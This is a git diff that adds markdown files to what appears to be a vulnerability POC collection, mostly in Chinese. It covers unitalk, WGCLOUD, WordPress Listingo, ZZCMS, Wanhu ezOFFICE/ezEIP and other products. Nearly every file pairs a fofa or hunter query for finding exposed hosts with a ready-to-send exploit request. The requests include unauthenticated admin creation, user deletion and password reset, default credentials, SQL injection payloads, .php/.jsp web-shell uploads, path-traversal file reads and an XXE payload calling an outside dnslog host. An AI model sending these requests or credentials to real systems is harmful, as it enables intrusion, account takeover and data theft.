@@ -0,0 +1,49 @@ +# unitalk存在任意用户删除漏洞 + +# 一、漏洞简介 +unitalk是一款即时通讯软件,unitalk存在任意用户删除漏洞 + +# 二、影响版本 ++ unitalk + +# 三、资产测绘 ++ fofa`title="unitalk"` ++ 特征 + +![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/S4lPrhEtVBKiZ1xe/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-094725.png) + +# 四、漏洞复现 +先获取token + +```plain +POST /unitalk/v1.0/user/getallusers.json HTTP/1.1 +Host: 172.18.14.68:7778 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35 +Content-Type: application/json;charset=UTF-8 + +{} +``` + +![1723521739904-fc153017-0a38-40a5-9656-f51032a33d77.png](./img/S4lPrhEtVBKiZ1xe/1723521739904-fc153017-0a38-40a5-9656-f51032a33d77-141909.png) + +删除用户 + +```plain +POST /unitalk/v1.0/user/delete.json HTTP/1.1 +Host: 172.18.14.68:7778 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Accept: application/json, text/plain, */* +Content-Type: application/json;charset=UTF-8 +Content-Length: 48 + +{"token":"87535651-49c2-4a19-8aeb-401fc16c2366"} +``` + +![1723521790592-8117867d-3825-480f-8ec9-3db0f77d5693.png](./img/S4lPrhEtVBKiZ1xe/1723521790592-8117867d-3825-480f-8ec9-3db0f77d5693-876257.png) + + + +> 更新: 2024-09-05 23:21:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/itmebnwadmoelggp> \ No newline at end of file diff --git a/unitalk存在任意用户密码修改漏洞.md b/unitalk存在任意用户密码修改漏洞.md new file mode 100644 index 0000000..281e5fa --- /dev/null +++ b/unitalk存在任意用户密码修改漏洞.md 
@@ -0,0 +1,48 @@ +# unitalk存在任意用户密码修改漏洞 + +# 一、漏洞简介 +unitalk是一款即时通讯软件,unitalk存在任意用户密码修改 + +# 二、影响版本 ++ unitalk + +# 三、资产测绘 ++ fofa`title="unitalk"` ++ 特征 + +![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/WSajtDrdCsRNXkAS/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-235810.png) + +# 四、漏洞复现 +先获取token + +```plain +POST /unitalk/v1.0/user/getallusers.json HTTP/1.1 +Host: 172.18.14.68:7778 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35 +Content-Type: application/json;charset=UTF-8 + +{} +``` + +![1723521739904-fc153017-0a38-40a5-9656-f51032a33d77.png](./img/WSajtDrdCsRNXkAS/1723521739904-fc153017-0a38-40a5-9656-f51032a33d77-254525.png) + +修改密码 + +```plain +POST /unitalk/v1.0/user/updateuser.json HTTP/1.1 +Host: 172.18.14.68:7778 +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/json;charset=UTF-8 +Content-Length: 99 + +{"name":"admin123","role":"admin","pwd":"admin1234","token":"87535651-49c2-4a19-8aeb-401fc16c2366"} +``` + +![1723521732885-692972b1-b3fb-4ab3-a25e-dc1698149902.png](./img/WSajtDrdCsRNXkAS/1723521732885-692972b1-b3fb-4ab3-a25e-dc1698149902-653368.png) + + + +> 更新: 2024-09-05 23:21:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qkiwy4qgvglm28o8> \ No newline at end of file diff --git a/unitalk存在任意用户添加漏洞.md b/unitalk存在任意用户添加漏洞.md new file mode 100644 index 0000000..7b0a3da --- /dev/null +++ b/unitalk存在任意用户添加漏洞.md 
@@ -0,0 +1,34 @@ +# unitalk存在任意用户添加漏洞 + +# 一、漏洞简介 +unitalk是一款即时通讯软件,unitalk存在任意用户添加漏洞 + +# 二、影响版本 ++ unitalk + +# 三、资产测绘 ++ fofa`title="unitalk"` ++ 特征 + +![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/21G5icesDMJ_SYeY/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-275032.png) + +# 四、漏洞复现 +```plain +POST /unitalk/v1.0/user/add.json HTTP/1.1 +Host: +Content-Type: application/json;charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Content-Length: 62 + +{"name":"admin123","role":"admin","pwd":"admin123","token":""} +``` + +![1723521483724-f75815f8-4d99-4335-9f9e-a9e515d80f87.png](./img/21G5icesDMJ_SYeY/1723521483724-f75815f8-4d99-4335-9f9e-a9e515d80f87-382491.png) + + + +> 更新: 2024-09-05 23:21:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/liqozczwz3ct02br> \ No newline at end of file diff --git a/unitalk存在敏感信息泄露漏洞.md b/unitalk存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..26fa53c --- /dev/null +++ b/unitalk存在敏感信息泄露漏洞.md 
@@ -0,0 +1,30 @@ +# unitalk存在敏感信息泄露漏洞 + +# 一、漏洞简介 +unitalk是一款即时通讯软件,unitalk存在敏感信息泄露漏洞 + +# 二、影响版本 ++ unitalk + +# 三、资产测绘 ++ fofa`title="unitalk"` ++ 特征 + +![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/5y4QT2B7hlz5Oba0/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-815430.png) + +# 四、漏洞复现 +```plain +POST /unitalk/v1.0/user/getallusers.json HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35 +Content-Type: application/json;charset=UTF-8 + +{} +``` + +![1723521050837-41476540-13f8-4fdc-80d8-f22c2fe6081a.png](./img/5y4QT2B7hlz5Oba0/1723521050837-41476540-13f8-4fdc-80d8-f22c2fe6081a-283024.png) + + + +> 更新: 2024-09-05 23:21:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xwkb6kvo30rpcip8> \ No newline at end of file diff --git a/unitalk存在默认弱口令漏洞.md b/unitalk存在默认弱口令漏洞.md new file mode 100644 index 0000000..b93e707 --- /dev/null +++ b/unitalk存在默认弱口令漏洞.md @@ -0,0 +1,25 @@ +# unitalk存在默认弱口令漏洞 + +# 一、漏洞简介 +unitalk是一款即时通讯软件,unitalk存在默认弱口令漏洞 + +# 二、影响版本 ++ unitalk + +# 三、资产测绘 ++ fofa`title="unitalk"` ++ 特征 + +![1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13.png](./img/r4U6CxAFixwqF68e/1723520849027-9f8e29d4-1ac6-46e0-b014-eb6ac435cc13-181498.png) + +# 四、漏洞复现 +```plain +admin/123456 +``` + +![1723520815146-a5c0eeb2-5604-4c79-96b9-62c2f32c3fa5.png](./img/r4U6CxAFixwqF68e/1723520815146-a5c0eeb2-5604-4c79-96b9-62c2f32c3fa5-228336.png) + + + +> 更新: 2024-09-05 23:21:36 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tr0gexzqbeulpspz> \ No newline at end of file diff --git a/wgcloud存在弱口令漏洞.md b/wgcloud存在弱口令漏洞.md new file mode 100644 index 0000000..04b2307 --- /dev/null +++ b/wgcloud存在弱口令漏洞.md 
@@ -0,0 +1,27 @@ +# wgcloud 存在弱口令漏洞 + +# 一、漏洞简介 +WGCLOUD设计思想为新一代极简运维监控系统,提倡快速部署,降低运维学习难度,全自动化运行,无模板和脚本。wgcloud 存在弱口令漏洞。 + +# 二、影响版本 ++ WGCLOUD + +# 三、资产测绘 ++ hunter`app.name="WGCLOUD"` + +# 四、漏洞复现 +```plain +admin/111111 +admin/admin123 +admin/mall123 +admin/promotion123 +``` + +![1708917579157-caa7ef0c-2643-4a3c-8e1e-32f90e179071.png](./img/UvieiqQPBxxJVlH7/1708917579157-caa7ef0c-2643-4a3c-8e1e-32f90e179071-556641.png) + +[wgcloud.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222141179-a4f038b2-589b-4f05-a78e-dbe4f397f14f.yaml) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xgfgq2u0fd358i6o> \ No newline at end of file diff --git a/wordpress-listingo-文件上传漏洞.md b/wordpress-listingo-文件上传漏洞.md new file mode 100644 index 0000000..a823ecd --- /dev/null +++ b/wordpress-listingo-文件上传漏洞.md @@ -0,0 +1,27 @@ +## wordpress listingo 文件上传漏洞 + +## fofa +``` +body="wp-content/themes/listingo" +``` + +## poc +``` +POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1 +Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rVjnfcgxgKoytcgAccept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Length: 531 + +------WebKitFormBoundary8rVjnfcgxgKoytcg +Content-Disposition: form-data; name="listingo_uploader";filename="1008.php" +Content-Type:text/php + +<?phpphpinfo();?> +------WebKitFormBoundary8rVjnfcgxgKoytcg +Content-Disposition: form-data; name="submit" + +Start Uploader +------WebKitFormBoundary8rVjnfcgxgKoytcg-- +``` +![image](https://github.com/wy876/POC/assets/139549762/8b115456-bcbe-4d0f-b51d-add3dcf0db78) diff --git a/zzcms系统接口ad_list.php存在SQL注入漏洞.md b/zzcms系统接口ad_list.php存在SQL注入漏洞.md new file mode 100644 index 0000000..ededcc4 --- /dev/null +++ b/zzcms系统接口ad_list.php存在SQL注入漏洞.md 
@@ -0,0 +1,22 @@ +# zzcms系统接口ad_list.php存在SQL注入漏洞 + +ZZCMS 2023是一款快速建站系统,产品招商模板程序源码,可以快速搭建产品招商网。例如医药招商、保健品招商、化妆品招商、农产品招商、孕婴童招商、酒类副食品等。 /admin/ad_list.php组件中关键字过滤导致sql注入漏洞 + +## poc + +```javascript +GET /admin/ad_list.php?action=pass&&keyword='+union+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(5)+--+x HTTP/1.1 +Host: 127.0.0.1:8888 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 +Cookie: http304ok=0; PHPSESSID=pvpehubud7epklbme9m4s69b0q; +Connection: close +``` + +![image-20250124101147558](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501241011639.png) + +## 漏洞来源 + +- https://github.com/En0t5/vul/blob/main/zzcms/zzcms-add_list-sql-inject.md \ No newline at end of file diff --git a/zzcms系统接口index.php存在SQL注入漏洞.md b/zzcms系统接口index.php存在SQL注入漏洞.md new file mode 100644 index 0000000..4b24564 --- /dev/null +++ b/zzcms系统接口index.php存在SQL注入漏洞.md @@ -0,0 +1,16 @@ +# zzcms系统接口index.php存在SQL注入漏洞 + +ZZCMS 2023中发现了一个严重漏洞。该漏洞影响了文件/index.php中的某些未知功能,操纵参数id会导致SQL注入,攻击可能是远程发起的,该漏洞已被公开披露并可被利用。 + +## poc + +```javascript +http://127.0.0.1:8888/zhanting/index.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,sleep(5)+--+x&skin= + +``` + +![image-20250124101356743](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501241013807.png) + +## 漏洞来源 + +- https://github.com/En0t5/vul/blob/main/zzcms/zzcsm-sql-inject.md \ No newline at end of file diff --git a/万户-ezOFFICE-DocumentEdit.jsp-SQL注入.md b/万户-ezOFFICE-DocumentEdit.jsp-SQL注入.md new file mode 100644 index 0000000..6772d8a --- /dev/null +++ b/万户-ezOFFICE-DocumentEdit.jsp-SQL注入.md 
@@ -0,0 +1,18 @@ +## 万户 ezOFFICE DocumentEdit.jsp SQL注入 + +DocumentEdit.jsp接口处存在sql注入漏洞,攻击者可获取数据库中敏感信息 + +## fofa +``` +app="ezOFFICE协同管理平台" +``` + +## poc +``` +GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1'%20union%20select%20null,null,(select%20user%20from%20dual),null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip, deflate +Connection: close +``` +![image](https://github.com/wy876/POC/assets/139549762/899ccb8d-22a3-4c5b-a50b-9d8a64ac73aa) diff --git a/万户OA-fileUpload.controller任意文件上传漏洞.md b/万户OA-fileUpload.controller任意文件上传漏洞.md new file mode 100644 index 0000000..0e84d9d --- /dev/null +++ b/万户OA-fileUpload.controller任意文件上传漏洞.md @@ -0,0 +1,32 @@ +## 万户OA-fileUpload.controller任意文件上传漏洞 + +万户OA /defaultroot/upload/fileUpload.controller 任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。 + +## fofa +```javascript +app="万户ezOFFICE协同管理平台" +``` + +## poc +```javascript +POST /defaultroot/upload/fileUpload.controller HTTP/1.1 +Host:  +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: Keep-Alive +Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0 +Content-Length: 773 + +--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0 +Content-Disposition: form-data; name="file"; filename="cmd.jsp" +Content-Type: application/octet-stream +Content-Transfer-Encoding: binary + +aaaaa +--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0-- +``` +![47f45d2a4762a6cf52707c1cddc901ef](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261037078.png) + +文件路径` /defaultroot/upload/html/xxxxxxxxxx.jsp` + diff --git a/万户OA-text2Html接口存在任意文件读取漏洞.md b/万户OA-text2Html接口存在任意文件读取漏洞.md new file mode 100644 index 0000000..a271989 
--- /dev/null +++ b/万户OA-text2Html接口存在任意文件读取漏洞.md @@ -0,0 +1,22 @@ +## 万户OA text2Html接口存在任意文件读取漏洞 + +## fofa +``` +app="万户网络-ezOFFICE" +``` + +## poc +``` +POST /defaultroot/convertFile/text2Html.controller HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 +Connection: close +Content-Length: 63 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +SL-CE-SUID: 1081 + +saveFileName=123456/../../../../WEB-INF/web.xml&moduleName=html +``` + +![e776895b9471c04a60d74a1666b56e1b](https://github.com/wy876/POC/assets/139549762/8217e88a-f2f5-47ba-9c27-eb765cbbed78) diff --git a/万户OA系统接口GeneralWeb存在XXE漏洞.md b/万户OA系统接口GeneralWeb存在XXE漏洞.md new file mode 100644 index 0000000..d656f8a --- /dev/null +++ b/万户OA系统接口GeneralWeb存在XXE漏洞.md @@ -0,0 +1,39 @@ +# 万户OA系统接口GeneralWeb存在XXE漏洞 + +万户OA系统接口GeneralWeb存在XXE漏洞,允许攻击者利用XML解析器处理外部实体,从而访问本地文件或进行其他恶意操作,可能导致敏感信息泄露和系统被攻击。 + +## fofa + +```javascript +app="万户ezOFFICE协同管理平台" +``` + +## poc + +```javascript +POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1 +Host: +User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Content-Type: text/xml;charset=UTF-8 +SOAPAction: +Content-Length: 457 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb"> + <soapenv:Body> + <gen:OAManager> + <gen:input> + <?xml version="1.0" encoding="UTF-8"?> + <!DOCTYPE root [ + <!ENTITY x SYSTEM "http://123.6x9ryk.dnslog.cn">]> + <root>&x;</root> + </gen:input> + </gen:OAManager> + </soapenv:Body> +</soapenv:Envelope> +``` + + + +## 漏洞来源 + +- https://forum.butian.net/share/3784 \ No newline at end of file diff --git a/万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞.md b/万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..1ab4825 --- /dev/null 
+++ b/万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +# 万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞 + +万户ezEIP企业管理系统productlist.aspx存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 + +## fofa + +```javascript +body="ezEIP" || header="ezEIP" || body="css/css_whir.css" +``` + +## poc + +```javascript +POST /shop/productlist.aspx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded + +ob=price&price=asc&svids=-1%29%3BDECLARE+%40%40proc_name+VARCHAR%28301%29%3BSet+%40%40proc_name%3DChar%28115%29%252bChar%28101%29%252bChar%28108%29%252bChar%28101%29%252bChar%2899%29%252bChar%28116%29%252bChar%2832%29%252bChar%2849%29%252bChar%2832%29%252bChar%28119%29%252bChar%28104%29%252bChar%28101%29%252bChar%28114%29%252bChar%28101%29%252bChar%2832%29%252bChar%2849%29%252bChar%2861%29%252bChar%2849%29%252bChar%2832%29%252bChar%2887%29%252bChar%2865%29%252bChar%2873%29%252bChar%2884%29%252bChar%2870%29%252bChar%2879%29%252bChar%2882%29%252bChar%2832%29%252bChar%2868%29%252bChar%2869%29%252bChar%2876%29%252bChar%2865%29%252bChar%2889%29%252bChar%2832%29%252bChar%2839%29%252bChar%2848%29%252bChar%2858%29%252bChar%2848%29%252bChar%2858%29%252bChar%2853%29%252bChar%2839%29%3BEXECUTE+%28%40%40proc_name%29%3B--a%2B +``` + +![image-20241017144051590](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410171440685.png) \ No newline at end of file diff --git a/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md b/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md new file mode 100644 index 0000000..5803b6b --- /dev/null +++ b/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md 
@@ -0,0 +1,24 @@ +# 万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞 + +万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞,攻击者可获取数据库敏感信息。 + +## fofa + +```yaml +app="万户ezOFFICE协同管理平台" +``` + +## poc + +``` +GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=221;waitfor+delay+'0:0:5'--+- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Connection: close +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/Oy5iPqfBXAh46tjHZFSg8w \ No newline at end of file diff --git a/万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞.md b/万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞.md new file mode 100644 index 0000000..232fe6e --- /dev/null +++ b/万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +# 万户ezOFFICE系统接口SendFileCheckTemplateEdit.jsp存在SQL注入漏洞 + +万户OA DocumentEdit.jsp存在前台SQL注入漏洞,攻击者利用此漏洞获取数据库权限,深入利用可获取服务器权限。 + +## fofa + +```javascript +app="万户网络-ezOFFICE" +``` + +## poc + +```bat +GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1%27%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27admin%27)),NULL,NULL,NULL,NULL,NULL-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Connection: close +``` + +![图片.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409241012161.png) + + + +## 漏洞来源 + +- https://forum.butian.net/article/600 \ No newline at end of file diff --git a/万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞.md b/万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞.md new file mode 100644 index 0000000..84e6a3d --- /dev/null +++ b/万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# 万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞 + +万户 ezOFFICE filesendcheck_gd.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 + +## fofa + +```yaml +app="万户ezOFFICE协同管理平台" +``` + +## poc + +```javascript +GET /defaultroot/modules/govoffice/gov_documentmanager/filesendcheck_gd.jsp;.js?recordId=1;waitfor+delay+'0:0:5'-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409101024017.png) \ No newline at end of file diff --git a/万户ezoffice-wpsservlet任意文件上传漏洞.md b/万户ezoffice-wpsservlet任意文件上传漏洞.md new file mode 100644 index 0000000..c18efa4 --- /dev/null +++ b/万户ezoffice-wpsservlet任意文件上传漏洞.md @@ -0,0 +1,28 @@ +## 万户ezoffice wpsservlet任意文件上传漏洞 +万户ezOFFICE协同管理平台是一个综合信息基础应用平台分为企业版和政务版。解决方案由五大应用、两个支撑平台组成,分别为知识管理、工作流程、沟通交流、辅助办公、集成解决方案及应用支撑平台、基础支撑平台。万户ezOFFICE协同管理平台wpsservlet接口存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限。 + + +## fofa +``` +app="万户网络-ezOFFICE" +``` + +## poc +``` +POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1 +Host: x.x.x.x +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Content-Length: 173Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Connection: close +Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerpDNT: 1 +Upgrade-Insecure-Requests: 1 + +--ufuadpxathqvxfqnuyuqaozvseiueerp +Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp" + +<% out.print("sasdfghjkj");%> +--ufuadpxathqvxfqnuyuqaozvseiueerp-- +``` +文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp + 
diff --git a/万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞.md b/万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞.md new file mode 100644 index 0000000..0a6bdae --- /dev/null +++ b/万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +# 万户ezoffice协同办公平台SignatureEditFrm存在SQL注入漏洞 +万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台SignatureEditFrm.jsp存在SQL注入漏洞,<font style="color:rgb(62, 62, 62);">攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。</font> + +## hunter + +```javascript +app.name="万户 Ezoffice OA" +``` + +## fofa + +```javascript +app="万户ezOFFICE协同管理平台" +``` + +![](https://cdn.nlark.com/yuque/0/2023/png/1622799/1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png) + +## poc +```javascript +GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iWebRevision.jsp/Signature/SignatureEditFrm.jsp?SignatureID=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Connection: close +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729701858827-06212d8a-1006-466d-ad6c-dae829018f0a.png) + diff --git a/万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞.md b/万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞.md new file mode 100644 index 0000000..35314c6 --- /dev/null +++ b/万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞.md 
@@ -0,0 +1,29 @@ +# 万江港利山洪灾害预警系统FileHandler存在任意文件读取漏洞 + +# 一、漏洞简介 +万江港利山洪灾害防治预警系统软件是对空间信息技术、计算机网络技术、现代通信技术进行无缝集成,结合灾害监测预警的业务需求,采用世界领先GIS地理信息处理技术、RS遥感技术、GPRS/CMDA/3G通讯技术、Microsoft Silverlight Web前端应用程式开发解决方案、以及大容量数据采集技术和大容量数据存储等计算机网络通信与数据处理技术,建立一个用户界面友好的、多终端的、可定制的、集数据采集、存储、分析于一体的综合地理信息平台。该系统存在任意文件读取漏洞,攻击者可获取大量敏感信息。 + +# 二、影响版本 ++ 万江港利山洪灾害防治预警系统 + +# 三、资产测绘 ++ hunter`web.body="万江港利"&&web.body="山洪灾害"` ++ 特征 + +![1707060667669-c1ce32a0-4c8f-48f5-8702-058ae589fffa.png](./img/A2AaAQ5sO23Cp0KK/1707060667669-c1ce32a0-4c8f-48f5-8702-058ae589fffa-102132.png) + +# 四、漏洞复现 +```plain +GET /Service/FileHandler.ashx?Action=Download&FileDirectory=E:/SCWJ/Official/Web/MFCW/&FileName=web.config&FileSourceName=web HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1707060726033-c1ac27d9-a692-4c07-8089-79dba4b37fea.png](./img/A2AaAQ5sO23Cp0KK/1707060726033-c1ac27d9-a692-4c07-8089-79dba4b37fea-174339.png) + + + +> 更新: 2024-02-29 23:55:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oeggkvpxmlddh3qv> \ No newline at end of file diff --git a/万能门店小程序doPageGetFormList存在sql注入漏洞.md b/万能门店小程序doPageGetFormList存在sql注入漏洞.md new file mode 100644 index 0000000..999c1eb --- /dev/null +++ b/万能门店小程序doPageGetFormList存在sql注入漏洞.md @@ -0,0 +1,21 @@ +# 万能门店小程序doPageGetFormList存在sql注入漏洞 + +万能门店小程序DIY建站无限独立版非微擎应用,独立版是基于国内很火的ThinkPHP5框架开发的,适用于各行各业小程序、企业门店小程序,万能门店小程序doPageGetFormList存在sql注入漏洞 + +## fofa + +```javascript +"/comhome/cases/index.html" +``` + +## poc + +```javascript +POST /api/wxapps/doPageGetFormList HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +suid='AND GTID_SUBSET(CONCAT((SELECT(md5(123456)))),3119)-- bdmV +``` + 
